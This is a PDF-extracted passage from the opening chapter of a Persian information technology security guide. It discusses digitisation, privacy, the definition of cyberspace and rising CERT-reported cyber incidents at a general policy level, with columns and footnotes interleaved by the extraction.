ﺍﺭﺯﺵ ﺯﻳﺎﺩ ﺁﻥ ﺷﺒﻜﻪ ﻭ ﺗﺄﺛﻴﺮﺍﺕ ﺑﺴﻴﺎﺭ ﻣﺨﺮﺏ ﻭ ﺟﺪﻱ ﻫﺮﮔﻮﻧـﻪ ﻧﻔـﻮﺫ
ﺑﻪ ﺁﻥ ﻛﺎﻣ ﹰ
ﻼ ﻣﻨﻄﻘﻲ ﺑﻨﻈﺮ ﻣﻲﺭﺳﺪ.
13
ﺑﺨﺶ ﺍﻭﻝ
ﺍﻣــﺮﻭﺯ ﺣﺘــﻲ ﻓﻴﻠﻤﻬــﺎﻱ ﺳــﻴﻨﻤﺎﻳﻲ ﻭ ﻛﺎﺭﺗﻮﻧﻬــﺎ ﻧﻴــﺰ ﺩﻳﺠﻴﺘــﺎﻟﻲ
ﺷﺪﻩﺍﻧﺪ؛ ﭼﺮﺍﻛﻪ ﺑﺪﻳﻦ ﺷﻜﻞ ﻫﺰﻳﻨـﻪﻫـﺎﻱ ﺗﻮﻟﻴـﺪ ﺁﻧﻬـﺎ ﻛﻤﺘـﺮ ﻭ
ﻛﻴﻔﻴﺘﺸﺎﻥ ﺑﻴﺸﺘﺮ ﺍﺳﺖ .ﺭﻓﺘﻪ ﺭﻓﺘﻪ ﻧﻮﺍﺭﻫﺎﻱ ﻭﻳﺪﺋﻮﻳﻲ ﺟﺎﻱ ﺧـﻮﺩ
ﺭﺍ ﺑﻪ ﻓﻨﺎﻭﺭﻱ DVDﺩﺍﺩﻩﺍﻧﺪ ﻭ ﻓﻴﻠﻤﻬﺎﻱ ﺳﻴﻨﻤﺎﻳﻲ ﺑـﺎ ﺍﻣﻜﺎﻧـﺎﺕ
ﺩﻳﺠﻴﺘﺎﻟﻲ ﺳﺎﺧﺘﻪ ﻭ ﺗﺪﻭﻳﻦ ﻣﻲﮔﺮﺩﻧﺪ.
ﻋﻴﺐﻳﺎﺑﻲ ﻭ ﻧﮕﻬﺪﺍﺭﻱ ﺧﻮﺩ ﺍﺯ ﺭﻳﺰﭘﺮﺩﺍﺯﻧﺪﻩﻫﺎ ﺍﺳﺘﻔﺎﺩﻩ ﻣـﻲﻛﻨﻨـﺪ.
ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﻜﺎﻧﻴﺎﺑﻲ ﺟﻬﺎﻧﻲ ) ١٣(GPSﻧﻴﺰ ﺑﻪ ﺷﻤﺎ ﺍﻳﻦ ﺍﻣﻜـﺎﻥ
ﺭﺍ ﻣﻲ ﺩﻫﻨﺪ ﻛﻪ ﺑﺪﺍﻧﻴﺪ ﺩﺭ ﻫﺮ ﻟﺤﻈﻪ ﺩﺭ ﭼـﻪ ﻣﻜـﺎﻧﻲ ﺭﻭﻱ ﻛـﺮﺓ
ﺯﻣﻴﻦ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻪﺍﻳﺪ ﻭ ﺑﺎ ﺩﺍﺷﺘﻦ ﭼﻨﻴﻦ ﺩﺳﺘﮕﺎﻩ ﻧﺴﺒﺘﹰﺎ ﺍﺭﺯﺍﻧـﻲ ﺩﺭ
ﻛﻨﺎﺭ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻛﻪ ﺣﺎﻭﻱ ﭘﺎﻳﮕﺎﻩ ﺩﺍﺩﻩﺍﻱ ﺍﺯ ﻧﻘﺸﻪﻫﺎ ﺑﺎﺷﺪ ﻗﺎﺩﺭ ﺑﻪ
ﻳﺎﻓﺘﻦ ﻣﺴﻴﺮ ﺣﺮﻛﺖ ،ﻧﻘﺎﻁ ﻣﻬﻢ ،ﺭﺳﺘﻮﺭﺍﻧﻬﺎ ،ﺗﺎﺑﻠﻮﻫـﺎﻱ ﺭﺍﻫﻨﻤـﺎ،
ﺧﺪﻣﺎﺕ ﺍﺭﺍﺋﻪﺷﺪﻩ ﺩﺭ ﻃﻮﻝ ﻣﺴﻴﺮ ،ﻭ ﺩﺭ ﻧﻬﺎﻳﺖ ﻣﻘﺼﺪ ﻣﻮﺭﺩ ﻧﻈـﺮ
ﺧﻮﺍﻫﻴﺪ ﺑﻮﺩ.
٣٠
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ
ﺁﻥ ﺍﻃﻼﻉ ﺩﺍﺭﻳﺪ ﻭ ﺑﺎ ﺁﻥ ﻣﻮﺍﻓﻖ ﻫﺴﺘﻴﺪ .ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻣﺮﺩﻡ ﺑـﺮﺍﻱ
ﺣﺮﻳﻢ ﺧﺼﻮﺻﻲ ﺧﻮﺩ ﺍﻫﻤﻴﺖ ﺯﻳﺎﺩﻱ ﻗﺎﺋﻞ ﻫﺴﺘﻨﺪ ﻭ ﺩﻭﻟﺘﻬﺎ ﻧﻴـﺰ
ﻣﺎﻳﻞ ﺑﻪ ﺣﻔﻆ ﺣﻘﻮﻕ ﺍﻓﺮﺍﺩ ﻣﻲﺑﺎﺷـﻨﺪ ،ﮔﺮﭼـﻪ ﻣﻴـﺰﺍﻥ ﻭ ﺷـﺪﺕ
ﺍﺟﺮﺍﻱ ﻗﻮﺍﻧﻴﻦ ﺍﺯ ﻳﻚ ﻛﺸﻮﺭ ﺗـﺎ ﻛـﺸﻮﺭ ﺩﻳﮕـﺮ ﻣﺘﻔـﺎﻭﺕ ﺍﺳـﺖ.
ﻣﺴﺌﻠﻪ ﺍﺻﻠﻲ ﺑـﺮﺍﻱ ﺩﻭﻟﺘﻬـﺎ ﺍﻳـﻦ ﺍﺳـﺖ ﻛـﻪ ﻣﻨـﺎﻓﻊ ﺣﺎﺻـﻞ ﺍﺯ
ﻓﻨﺎﻭﺭﻳﻬﺎﻱ ﻧﻮﻇﻬﻮﺭ ﺭﺍ ﺗﺸﺨﻴﺺ ﺩﻫﻨﺪ ﻭ ﺩﺭ ﻋﻴﻦ ﺣﺎﻝ ﺍﺭﺯﺷﻬﺎ ﻭ
ﺁﺯﺍﺩﻳﻬﺎﻳﻲ ﻛﻪ ﺑﺪﻭﻥ ﺁﻥ ﻓﻨﺎﻭﺭﻳﻬﺎ ﻣﻲﺗﻮﺍﻥ ﺍﺯ ﺁﻧﻬﺎ ﺑﺮﺧﻮﺭﺩﺍﺭ ﺑـﻮﺩ
ﺭﺍ ﻫﻤﭽﻨﺎﻥ ﺣﻔﻆ ﻛﻨﻨﺪ .ﻣﻮﺿﻮﻉ ﺍﻳـﻦ ﺍﺳـﺖ ﻛـﻪ ﺩﻭﻟﺘﻬـﺎ ﺑﺎﻳـﺪ
ﻓﻨﺎﻭﺭﻳﻬﺎﻱ ﺟﺪﻳﺪ ﺭﺍ ﺩﺭﻙ ﻛﺮﺩﻩ ﻭ ﺗﺄﺛﻴﺮ ﻗﺎﺑﻠﻴﺘﻬﺎ ﻭ ﺍﻣﻜﺎﻧﺎﺕ ﻧﻮﻳﻦ
ﺑﺮ ﺁﺯﺍﺩﻳﻬﺎ ﺭﺍ ﺍﺭﺯﻳﺎﺑﻲ ﻧﻤﺎﻳﻨـﺪ .ﻫﻤﭽﻨـﻴﻦ ﺩﻭﻟﺘﻬـﺎ ﺑﺎﻳـﺪ ﮔﺎﻣﻬـﺎﻱ
ﻣﺆﺛﺮﻱ ﺑﺮﺩﺍﺭﻧﺪ ﺗـﺎ ﻣﻄﻤـﺌﻦ ﺷـﻮﻧﺪ ﺍﮔـﺮ ﻗـﻮﺍﻧﻴﻦ ﻭ ﺳﻴﺎﺳـﺘﻬﺎﻱ
ﻋﻤﻮﻣﻲ ﺩﺭ ﺍﻳﻦ ﺯﻣﻴﻨﻪ ﺁﺯﺍﺩﻳﻬـﺎﻱ ﻓﻌﻠـﻲ ﺭﺍ ﺗﻘﻮﻳـﺖ ﻧﻤـﻲﻛﻨﻨـﺪ،
ﺣﺪﺍﻗﻞ ﻳﻚ ﻭﻓﺎﻕ ﺟﻤﻌﻲ ﺩﺭ ﻣﻮﺭﺩ ﺁﻧﻬﺎ ﻭﺟﻮﺩ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ.
ﻻ ﺑـﺎ ﻋﻨـﻮﺍﻥ ﻓـﻀﺎﻱ ﺳـﺎﻳﺒﺮ ١٥ﺷـﻨﺎﺧﺘﻪ
ﺩﻧﻴﺎﻱ ﺩﻳﺠﻴﺘﺎﻟﻲ ﻣﻌﻤﻮ ﹰ
ﻣﻲﺷﻮﺩ ﻭ ﺗﻌﺮﻳﻒ ﺁﻥ ﺗﻤﺎﻣﻲ ﺭﺍﻳﺎﻧﻪﻫﺎ ﻭ ﺍﺑﺰﺍﺭﻫﺎﻱ ﺩﻳﺠﻴﺘﺎﻟﻲ ﻛـﻪ
ﺑﺎ ﺷﺒﻜﻪﻫﺎﻱ ﺩﺍﺧﻠﻲ ﻭ ﺧـﺎﺭﺟﻲ ﺑـﻪ ﻫـﻢ ﻣﺘـﺼﻞ ﻣـﻲ ﺷـﻮﻧﺪ ﻭ
ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﺎ ﻳﻜﺪﻳﮕﺮ ﺍﺭﺗﺒﺎﻁ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ ﺭﺍ ﺩﺭ ﺑﺮ ﻣﻲﮔﻴﺮﺩ ١٦.ﺩﺭ
ﻓﻀﺎﻱ ﺳﺎﻳﺒﺮ ﻫﻢ ﻣﺜﻞ ﻓﻀﺎﻱ ﻓﻴﺰﻳﻜﻲ ﻣﻲﺗﻮﺍﻥ ﺩﺭﺑﺎﺭﺓ ﻣﻼﻗﺎﺗﻬﺎ
ﻭ ﺍﻧﺠﺎﻡ ﻛﺎﺭﻫﺎ ﺻﺤﺒﺖ ﻛﺮﺩ ،ﺍﻣـﺎ ﺑﺎﻳـﺪ ﻣﻴـﺎﻥ ﺭﻓﺘـﺎﺭ ﺩﺭ ﻓـﻀﺎﻱ
ﺳﺎﻳﺒﺮ ﻭ ﺩﻧﻴﺎﻱ ﺣﻘﻴﻘﻲ ﻛﻪ ﺩﺭ ﺁﻥ ﺯﻧﺪﮔﻲ ،ﻛﺎﺭ ﻭ ﺑﺎﺯﻱ ﻣﻲﻛﻨـﻴﻢ
ﺗﻔﺎﻭﺕ ﻗﺎﺋﻞ ﺷﺪ.
ﮔــﺴﺘﺮﺵ ﻭ ﺭﻭﺍﺝ ﺳــﺮﻳﻊ ﺭﺍﻳﺎﻧــﻪﻫــﺎﻱ ﺷﺨــﺼﻲ ﻭ ﺍﻳﻨﺘﺮﻧــﺖ ﺩﺭ
ﺑﺨﺸﻬﺎﻱ ﻣﺨﺘﻠﻒ ﻛﺸﻮﺭﻫﺎﻱ ﺩﺭﺣـﺎﻝ ﺗﻮﺳـﻌﻪ ﻣﻨـﺎﻓﻊ ﺑـﺴﻴﺎﺭﻱ
ﺩﺍﺷﺘﻪ ﺍﺳﺖ .ﺑﺎ ﺍﻳﻨﺤﺎﻝ ﺍﻳﻨﺘﺮﻧﺖ ﺑﺨﻮﺩﻱ ﺧﻮﺩ ﺭﺳـﺎﻧﻪﺍﻱ ﻧﻴـﺴﺖ
ﻛﻪ ﻧﺴﺒﺖ ﺑﻪ ﺭﻓﺘﺎﺭ ﺗﺒﻬﻜﺎﺭﺍﻧﻪ ﺍﻳﻤﻨﻲ ﺩﺍﺷﺘﻪ ﺑﺎﺷـﺪ .ﻫﺰﻳﻨـﺔ ﻋـﺪﻡ
ﺗﻮﺟﻪ ﻛﺎﻓﻲ ﺑﻪ ﺍﻣﻨﻴﺖ ﻣﻲﺗﻮﺍﻧﺪ ﺍﺯ ﺩﺳـﺖ ﺩﺍﺩﻥ ﺩﺍﺩﻩﻫـﺎﻱ ﻣـﻮﺭﺩ
ﻧﻴﺎﺯ ﺑﺮﺍﻱ ﺍﻧﺠﺎﻡ ﻛﺎﺭ ﻳﻚ ﺳـﺎﺯﻣﺎﻥ ﺑـﺰﺭﮒ ﻳـﺎ ﻣﺆﺳـﺴﺔ ﺩﻭﻟﺘـﻲ
ﺑﺎﺷﺪ .ﺍﻳﻨﺘﺮﻧﺖ ﻣﺎﻫﻴﺘﹰﺎ ﺍﺯ ﺍﻳﻤﻨﻲ ﻻﺯﻡ ﺑﺮﺧﻮﺭﺩﺍﺭ ﻧﻴﺴﺖ ﺍﻣﺎ ﻫﺰﻳﻨـﺔ
ﺍﻣﻦ ﻛﺮﺩﻥ ﺁﻥ ﻧﻴﺰ ﺩﺭ ﻣﻘﺎﻳﺴﻪ ﺑﺎ ﻫﺰﻳﻨﺔ ﺍﺯ ﺩﺳﺖ ﺭﻓﺘﻦ ﺩﺍﺩﻩﻫﺎﻱ
۱۶
Cyberspace
"ﻓﻀﺎﻱ ﺳﺎﻳﺒﺮ" ﺍﻭﻟﻴﻦ ﺑﺎﺭ ﺗﻮﺳـﻂ ﻳـﻚ ﻧﻮﻳـﺴﻨﺪﻩ ﺑـﻪ ﻧـﺎﻡ William
Gibsonﺑﺮﺍﻱ ﻳﻚ ﺩﻧﻴﺎﻱ ﻣﻮﺍﺯﻱ ﻛﻪ ﺗﻮﺳﻂ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺳﺮﺍﺳﺮ ﺩﻧﻴـﺎ
ﺳـــﺎﺧﺘﻪ ﺷـــﺪﻩ ﺑـــﻮﺩ ﺩﺭ ﺳـــﺎﻝ ۱۹۸۴ﻭ ﺩﺭ ﺭﻣـــﺎﻥ ﺍﻭ ﺑـــﺎ ﻋﻨـــﻮﺍﻥ
" "Neuromancerﺑﻜﺎﺭ ﺭﻓﺖ .ﺍﻳﻦ ﺗﻌﺮﻳﻒ ﻣﻲﺗﻮﺍﻧﺪ ﺩﺭ ﺍﺩﺑﻴﺎﺕ ﻣﻔﻴﺪ
ﺑﺎﺷﺪ ،ﺍﻣﺎ ﻣﻌﻨﻲ ﺁﻥ ﺑﺘﺪﺭﻳﺞ ﺍﺯ ﺁﻧﭽﻪ Gibsonﻣﺪ ﻧﻈﺮ ﺩﺍﺷـﺖ ﺗﻐﻴﻴـﺮ
ﻳﺎﻓﺘﻪ ﺍﺳﺖ .ﺑﺮﺍﻱ ﺍﻃﻼﻋﺎﺕ ﺑﻴﺸﺘﺮ ﺑﻪ ﻫﻤﻴﻦ ﭘﺎﻭﺭﻗﻲ ﺩﺭ ﻛﺘﺎﺏ ﺍﺻﻠﻲ ﻭ
ﻳﺎ ﻣﻨﺒﻊ ﺯﻳﺮ ﻣﺮﺍﺟﻌﻪ ﻛﻨﻴﺪ:
Intven, et al., Legal and Regulatory Aspects of
e-Commerce and the Internet, World Bank
)Legal Review, vol. 1 2003, at fn 17. (Kluwer
ﺍﺭﺯﺷﻤﻨﺪ ﺳﺎﺯﻣﺎﻧﻬﺎ ﻭ ﻣﺆﺳﺴﺎﺕ ﭼﻨﺪﺍﻥ ﻗﺎﺑﻞ ﺗﻮﺟﻪ ﻧﻤﻲﺑﺎﺷـﺪ .ﺍﺯ
ﺩﻳﮕﺮ ﻣﻮﺍﺭﺩﻱ ﻛﻪ ﻣﻲ ﺗﻮﺍﻧﺪ ﺑﺴﻴﺎﺭ ﻣﻬﻢ ﺑﺎﺷﺪ ﺁﻧـﺴﺖ ﻛـﻪ ﺗـﺄﺛﻴﺮ
ﺳﺮﻗﺖ ﻭ ﻭﻗﻮﻉ ﺗﺨﻠﻒ ﻣﺎﻟﻲ ﺩﺭ ﻳﻚ ﺷﺮﻛﺖ ﺗﻨﻬﺎ ﻣﺤﺼﻮﺭ ﺑﻪ ﺁﻥ
ﺷﺮﻛﺖ ﻧﻴﺴﺖ ﻭ ﺩﺭ ﻛﻞ ﺻﻨﻌﺖ ﻛﺸﻮﺭ ﺗﺄﺛﻴﺮ ﻣﻲﮔﺬﺍﺭﺩ.
ﺑﺎ ﮔﺴﺘﺮﺵ ﺍﻳﻨﺘﺮﻧﺖ ﻭ ﺍﻓﺰﺍﻳﺶ ﭼـﺸﻤﮕﻴﺮ ﻧﮕﺮﺍﻧﻴﻬـﺎﻱ ﻧﺎﺷـﻲ ﺍﺯ
ﺣﻤﻼﺕ ﺳﺎﻳﺒﺮ ،١٧ﺗﻌﺪﺍﺩ ﭼﻨﻴﻦ ﺣﻮﺍﺩﺛﻲ ﻧﻴﺰ ﺭﻭ ﺑﻪ ﺍﻓﺰﺍﻳﺶ ﺍﺳﺖ:
"ﺑﺎ ﻭﺟﻮﺩ ﺍﻳﻨﻜﻪ ﺭﺍﻳﺎﻧﻪ ﻫﺎ ﻧﻘﻄﺔ ﻣﻨﺎﺳـﺒﻲ ﺑـﺮﺍﻱ ﺍﻧﺠـﺎﻡ ﺣﻤـﻼﺕ
ﺗﺮﻭﺭﻳﺴﺘﻲ ﻫﺴﺘﻨﺪ ،ﺍﻣﺎ ﺍﻳﻦ ﻧﻜﺘﻪ ﺭﺍ ﻧﻴﺰ ﺑﺎﻳﺪ ﺩﺭﻧﻈـﺮ ﺩﺍﺷـﺖ ﻛـﻪ
ﺑﺮﺧﻲ ﺍﻗﺪﺍﻣﺎﺕ ﺧﺮﺍﺑﻜﺎﺭﺍﻧﻪ ﺗﻮﺳﻂ ﺍﻓﺮﺍﺩﻱ ﺻﻮﺭﺕ ﻣﻲﮔﻴﺮﻧﺪ ﻛـﻪ
ﺍﺯ ﺍﻳﻦ ﺭﺍﻩ ﺑﺪﻧﺒﺎﻝ ﻛﺴﺐ ﺩﺭﺁﻣﺪ ﻫﺴﺘﻨﺪ .ﻣﺮﻛﺰ ﻓﻮﺭﻳﺘﻬﺎﻱ ﺍﻣﻨﻴـﺖ
ﺭﺍﻳﺎﻧﻪﺍﻱ ) ١٨(CERTﺩﺭ ﺳﺎﻝ ۲۰۰۱ﻣـﻴﻼﺩﻱ ﺭﻗﻤـﻲ ﺑﺮﺍﺑـﺮ ﺑـﺎ
۵۲۶۵۸ﺭﺧﺪﺍﺩ ﺍﻣﻨﻴﺘﻲ ﺍﻳﻨﺘﺮﻧﺘﻲ ﺭﺍ ﺷﻨﺎﺳﺎﻳﻲ ﻛﺮﺩﻩ ﻛـﻪ ﺩﻭ ﺑﺮﺍﺑـﺮ
ﺗﻌﺪﺍﺩ ﻳﻜﺴﺎﻝ ﻗﺒﻠﺘﺮ ﺍﺳﺖ ﻭ ﻧﺴﺒﺖ ﺑﻪ ﺩﻭ ﺳﺎﻝ ﭘﻴﺶ ﺍﺯ ﺁﻥ ﭼﻬﺎﺭ
١٩
ﺑﺮﺍﺑﺮ ﻣﻲﺑﺎﺷﺪ".
ﺑﺤﺚ ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪﻫﺎ ﻭ ﺷﺒﻜﻪﻫﺎ ﺑﺮﺍﻱ ﻛﺸﻮﺭﻫﺎﻱ ﺩﺭﺣﺎﻝ ﺗﻮﺳﻌﻪ
ﺍﺯ ﺍﻫﻤﻴﺖ ﺧﺎﺻﻲ ﺑﺮﺧﻮﺭﺩﺍﺭ ﺍﺳﺖ .ﺍﻳﻨﺘﺮﻧﺖ ﻣﻲﺗﻮﺍﻧﺪ ﻓﻮﺍﺻﻞ ﺭﺍ ﺍﺯ
ﻣﻴﺎﻥ ﺑﺮﺩﺍﺭﺩ ﻭ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﻣﻄﺎﻟﺐ ﺑﻲﺷﻤﺎﺭﻱ ﺭﺍ ﻓـﺮﺍﻫﻢ ﻛﻨـﺪ.
ﺑــﺎ ﻭﺟــﻮﺩ ﺷــﺒﻜﺔ ﺟﻬــﺎﻧﻲ ﻭﺏ ،ﺍﻳﻨﺘﺮﻧــﺖ ﻗــﺎﺩﺭ ﺧﻮﺍﻫــﺪ ﺑــﻮﺩ ﺍﺯ
ﺍﻃﻼﻋــﺎﺕ ﻣﻮﺟــﻮﺩ ﺩﺭﺑــﺎﺭﺓ ﺷــﺮﻛﺘﻬﺎ ،ﺍﻣﻜﺎﻧــﺎﺕ ،ﻭ ﻣﺤــﺼﻮﻻﺕ
ﻛﺸﻮﺭﻫﺎﻱ ﺩﺭﺣﺎﻝ ﺗﻮﺳﻌﻪ ﺍﺳـﺘﻔﺎﺩﻩ ﻛﻨـﺪ ﻭ ﺗﺠـﺎﺭﺕ ﺭﺍ ﺩﺭ ﺁﻧﻬـﺎ
ﺗﻮﺳــﻌﻪ ﺩﻫــﺪ .ﻋــﻼﻭﻩ ﺑــﺮ ﺍﻳــﻦ ،ﻣﻮﺗﻮﺭﻫــﺎﻱ ﺟــﺴﺘﺠﻮ ﺍﺯ ﻧﻈــﺮ
ﺟﻐﺮﺍﻓﻴﺎﻳﻲ ﺗﻤﺎﻳﺰﻱ ﻣﻴﺎﻥ ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﻭﺏ ﻗﺎﺋـﻞ ﻧﻤـﻲ ﺷـﻮﻧﺪ؛ ﻭ
ﺑﺪﻳﻦ ﺗﺮﺗﻴﺐ ﺗﺄﻣﻴﻦ ﻛﻨﻨﺪﮔﺎﻥ ﺧﺪﻣﺎﺕ ﻭ ﻛﺎﻻﻫﺎﻱ ﺍﺳﺎﺳﻲ ﻭ ﻣﻮﺍﺩ
ﺍﻭﻟﻴـــﺔ ﻛـــﺸﻮﺭﻫﺎﻱ ﺩﺭﺣـــﺎﻝ ﺗﻮﺳـــﻌﻪ ﺭﻭﻱ ﻭﺏ ﺩﺭ ﻛﻨـــﺎﺭ
ﺗﺄﻣﻴﻦﻛﻨﻨﺪﮔﺎﻥ ﻛﺎﻻﻫﺎ ﻭ ﺧﺪﻣﺎﺕ ﻛﺸﻮﺭﻫﺎﻱ ﺗﻮﺳﻌﻪﻳﺎﻓﺘـﻪ ﻗـﺮﺍﺭ
٢١
ﻣﻲﮔﻴﺮﻧﺪ ٢٠.ﺍﻳﻦ ﺍﻣﺮ ﺭﺍ ﮔﺎﻫﻲ "ﻣـﺮﮒ ﻓﺎﺻـﻠﻪﻫـﺎ" ﻣـﻲﻧﺎﻣﻨـﺪ؛
ﻭﺍﮊﻩﺍﻱ ﻛﻪ ﺭﻭﻧﺪ ﺟﺮﻳﺎﻥ ﺍﻃﻼﻋﺎﺕ ﺩﺭ ﺍﻳﻨﺘﺮﻧﺖ ﺭﺍ ﻧﺸﺎﻥ ﻣﻲﺩﻫﺪ.
Cyber Attacks
Computer Emergency Response Team
Reuters/USA Today, April 16, 2003
15
۲۰
ﺩﺭ ﺣﻘﻴﻘﺖ ﻣﻮﺗﻮﺭﻫـﺎﻱ ﺟـﺴﺘﺠﻮ ﺑـﺮ ﺍﺳـﺎﺱ ﺯﺑـﺎﻥ ﻣﻴـﺎﻥ ﭘﺎﺳـﺨﻬﺎﻱ
ﻳﺎﻓﺘﻪﺷﺪﻩ ﺗﻔﺎﻭﺕ ﻣﻲﮔﺬﺍﺭﻧﺪ ،ﻭ ﻟﺬﺍ ﺩﺭ ﺑﺎﺯﺍﺭ ﺟﻬﺎﻧﻲ ﻫﺮ ﻛـﺲ ﺑﺎﻳـﺪ ﺑـﻪ
ﺯﺑﺎﻥ ﺑﺎﺯﺍﺭ ﻫﺪﻑ ﺧﻮﺩ ﺻـﺤﺒﺖ ﻛﻨـﺪ .ﻫﻤﭽﻨـﻴﻦ ﻣﻮﺗﻮﺭﻫـﺎﻱ ﺟـﺴﺘﺠﻮ
ﻣﻤﻜﻦ ﺍﺳﺖ ﺁﻧﻘﺪﺭ ﺗﺤﻤﻞ ﻧﺪﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ ﻛﻪ ﺑﺨﻮﺍﻫﻨﺪ ﻣﻨﺘﻈـﺮ ﺩﺭﻳﺎﻓـﺖ
ﭘﺎﺳﺦ ﺍﺯ ﭘﺎﻳﮕﺎﻫﻬﺎﻳﻲ ﺑﺎﺷﻨﺪ ﻛـﻪ ﺍﺭﺗﺒﺎﻃـﺸﺎﻥ ﻛﻨـﺪ ﺍﺳـﺖ .ﺩﺭ ﻫﺮﺣـﺎﻝ
ﺷﺮﻛﺘﻬﺎﻱ ﺗﺠﺎﺭﻱ ﻣﻲﺗﻮﺍﻧﻨﺪ ﭘﺎﻳﮕﺎﻩ ﺧﻮﺩ ﺭﺍ ﺩﺭ ﻫﺮ ﻛﺠﺎﻱ ﺩﻧﻴﺎ ﻣﻴﺰﺑﺎﻧﻲ
ﻛﻨﻨﺪ ﻭ ﺑﮕﻮﻧﻪﺍﻱ ﻣﺤﻞ ﻣﻴﺰﺑﺎﻥ ﺧـﻮﺩ ﺭﺍ ﺑﺮﮔﺰﻳﻨﻨـﺪ ﻛـﻪ ﺍﻃﻼﻋـﺎﺕ ﺑـﻪ
ﺑﺎﺯﺍﺭﻫــﺎﻱ ﻫــﺪﻑ ﻧﺰﺩﻳــﻚ ﺑﺎﺷــﺪ .ﺑﻌــﻀﻲ ﺍﺯ ﺷــﺮﻛﺘﻬﺎ ﺍﺯ ﭘﺎﻳﮕﺎﻫﻬــﺎﻱ
ﺍﻧﻌﻜﺎﺳﻲ ) (mirror sitesﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻨﺪ؛ ﺑﻪ ﺍﻳﻦ ﻣﻌﻨـﻲ ﻛـﻪ ﻳـﻚ
17
18
19
٣١
ﺑﺨﺶ ﺍﻭﻝ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﺩﺭ ﻋﺼﺮ ﺩﻳﺠﻴﺘﺎﻝ
ﻣﺘﺄﺳﻔﺎﻧﻪ ﻫﻤﺔ ﻇﻮﺍﻫﺮ ﺧﻮﺏ ﻭ ﺑﺪ ﺍﻧﺴﺎﻧﻲ ﺭﺍ ﻣﻲﺗﻮﺍﻥ ﺩﺭ ﻓـﻀﺎﻱ
ﺳﺎﻳﺒﺮ ﻧﻴﺰ ﻣﺸﺎﻫﺪﻩ ﻧﻤﻮﺩ .ﺍﺯ ﺁﻧﺠﺎ ﻛﻪ ﻧﺴﺨﻪﺑﺮﺩﺍﺭﻱ ﺍﺯ ﻣـﻀﺎﻣﻴﻦ
ﺩﻳﺠﻴﺘـﺎﻟﻲ ﻭ ﻭﻳــﺮﺍﻳﺶ ﺁﻧﻬــﺎ ﺁﺳــﺎﻥ ﺍﺳــﺖ ،ﻣﻐﺎﻟﻄــﻪ ﻭ ﺗﺤﺮﻳــﻒ
ﺍﻃﻼﻋﺎﺕ ﻣﺜﻞ ﺟﻌﻞ ﻣﺴﺘﻨﺪﺍﺕ ﺍﺩﺍﺭﻱ ﻭ ﺭﺳﻤﻲ ﺁﺳﺎﻥ ﻣﻲﺷـﻮﺩ.
ﺑﻪ ﺩﻟﻴﻞ ﺁﻧﻜﻪ ﺍﻳﻨﺘﺮﻧﺖ ﺍﺯ ﻳﻚ ﻣﺤﻴﻂ ﭘﮋﻭﻫﺸﻲ ﻭ ﺗﻌﺎﻭﻧﻲ ﺷـﺮﻭﻉ
ﺑﻪ ﻛﺎﺭ ﻛﺮﺩ ﻭ ﻫﺪﻑ ﺁﻥ ﺍﺷﺘﺮﺍﻙ ﺁﺳﺎﻥ ﺍﻃﻼﻋﺎﺕ ﺑـﻮﺩ ،ﺳـﺎﺧﺘﺎﺭ
ﺁﻥ ﺑﺎﻋــﺚ ﺗــﺴﻬﻴﻞ ﺣﻤﻠــﻪ ﺑــﻪ ﺭﺍﻳﺎﻧــﻪﻫــﺎ ﻭ ﺳــﺮﻗﺖ ﺍﻃﻼﻋــﺎﺕ
ﻣﺤﺮﻣﺎﻧﻪ ﻣﻲﮔﺮﺩﺩ.
ﺍﻧﮕﻴﺰﺓ ﺍﻓﺮﺍﺩﻱ ﻛﻪ ﺩﺭ ﻓﻀﺎﻱ ﺳﺎﻳﺒﺮ ﭼﻨﻴﻦ ﺭﻓﺘﺎﺭﻱ ﺍﺯ ﺧﻮﺩ ﺑـﺮﻭﺯ
ﻣﻲﺩﻫﻨﺪ ﺷﺒﻴﻪ ﺍﻧﮕﻴﺰﻩﻫﺎﻳﻲ ﺍﺳﺖ ﻛﻪ ﺩﺭ ﺩﻧﻴﺎﻱ ﻭﺍﻗﻌﻲ ﺁﻧﻬﺎ ﺭﺍ ﺑﻪ
ﻛﺎﺭﻫﺎﻱ ﻣﺸﺎﺑﻪ ﻭﺍﺩﺍﺭ ﻣﻲﻛﻨﺪ ،ﺍﻣﺎ ﺑﺎ ﻳﻚ ﺗﻔﺎﻭﺕ ﻋﻤﺪﻩ :ﻣﺤﻴﻄﻲ
ﻛﻪ ﺗﻮﺳﻂ ﺭﺍﻳﺎﻧﻪﻫﺎ ﻭ ﺍﻳﻨﺘﺮﻧﺖ ﺑﻮﺟﻮﺩ ﺁﻣﺪﻩ ﺑﺎﻋﺚ ﺷـﺪﻩ ﺩﺭ ﺍﻓـﺮﺍﺩ
ﺍﻳﻦ ﺗﻤﺎﻳﻞ ﺑﻮﺟﻮﺩ ﺑﻴﺎﻳﺪ ﻛﻪ ﺑﺨﻮﺍﻫﻨﺪ ﺛﺎﺑﺖ ﻛﻨﻨﺪ ﻛﻪ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﻪ
ﻧﺴﺨﻪ ﺍﺯ ﭘﺎﻳﮕﺎﻩ ﺭﺍ ﺩﺭ ﻳﻚ ﻣﺤﻞ ﻣﺘﻔﺎﻭﺕ ﺟﻐﺮﺍﻓﻴﺎﻳﻲ ﻣﻴﺰﺑﺎﻧﻲ ﻣﻲﻛﻨﻨـﺪ
ﺗﺎ ﺯﻣﺎﻥ ﺩﺳﺘﺮﺳﻲ ﻣﺸﺘﺮﻱ ﺑﻪ ﺍﻃﻼﻋﺎﺕ ،ﺣﺪﺍﻗﻞ ﺷﻮﺩ.
Cairncross, F., The Death of Distance: How
the Communications Revolution will Change
